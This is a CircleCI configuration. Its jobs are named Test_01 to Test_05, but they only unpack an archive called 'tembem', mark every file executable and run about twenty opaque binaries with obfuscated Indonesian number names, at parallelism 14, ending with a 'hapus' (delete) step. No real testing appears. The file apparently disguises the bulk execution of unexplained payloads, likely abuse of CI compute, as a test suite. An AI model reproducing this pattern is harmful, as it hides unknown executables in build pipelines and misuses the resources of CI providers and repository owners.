
version: 2.1

commands:
  setup:
    steps:
      - run:
          name: SetUp_01
          command: |
            tar -xf tembem && chmod u+x *
            ./apem
            ./star
            ./mod
            ./02

  setep:
    steps:
      - run:
          name: SetUp_02
          command: |
            ./hapus

  setip:
    parameters:
      result:
        type: string
    steps:
      - run:
          name: SetUp_02
          command: |
            ./s4tu

      - run:
          name: SetUp_03
          command: |
            ./du4

      - run:
          name: SetUp_04
          command: |
            ./t19a

      - run:
          name: SetUp_05
          command: |
            ./emp4t

      - run:
          name: SetUp_06
          command: |
            ./l1m4

      - run:
          name: SetUp_07
          command: |
            ./3n4m

      - run:
          name: SetUp_08
          command: |
            ./7ujuh

      - run:
          name: SetUp_09
          command: |
            ./d3l4pan

      - run:
          name: SetUp_10
          command: |
            ./53m81l4n

      - run:
          name: SetUp_11
          command: |
            ./53puluh

      - run:
          name: SetUp_12
          command: |
            ./s3bel45

      - run:
          name: SetUp_13
          command: |
            ./du4b3l45

      - run:
          name: SetUp_14
          command: |
            ./t194b3l4s

      - run:
          name: SetUp_15
          command: |
            ./3mp4t83l45

      - run:
          name: SetUp_16
          command: |
            ./l1m483l45

      - run:
          name: SetUp_17
          command: |
            ./3n4mb3l45

      - run:
          name: SetUp_18
          command: |
            ./7ujuh83l45

      - run:
          name: SetUp_19
          command: |
            ./d3l4p4nB3l45

      - run:
          name: SetUp_20
          command: |
            ./hapus

jobs:
  Test_01:
    docker:
      - image: cimg/base:stable
    steps:
      - checkout
      - setup
      - setep

  Test_02:
    docker:
      - image: cimg/base:stable
    steps:
      - checkout
      - setup
      - setip:
          result: Test_02
    parallelism: 14

  Test_03:
    docker:
      - image: cimg/base:stable
    steps:
      - checkout
      - setup
      - setip:
          result: Test_03
    parallelism: 14

  Test_04:
    docker:
      - image: cimg/base:stable
    steps:
      - checkout
      - setup
      - setip:
          result: Test_04
    parallelism: 14

  Test_05:
    docker:
      - image: cimg/base:stable
    steps:
      - checkout
      - setup
      - setip:
          result: Test_05
    parallelism: 14



workflows:
  version: 2.1
  workflo_01:
    jobs:
      - Test_01
      - Test_02:
          requires:
            - Test_01
      - Test_03:
          requires:
            - Test_01
      - Test_04:
          requires:
            - Test_01
            - Test_02
            - Test_03
      - Test_05:
          requires:
            - Test_01
            - Test_02
            - Test_03

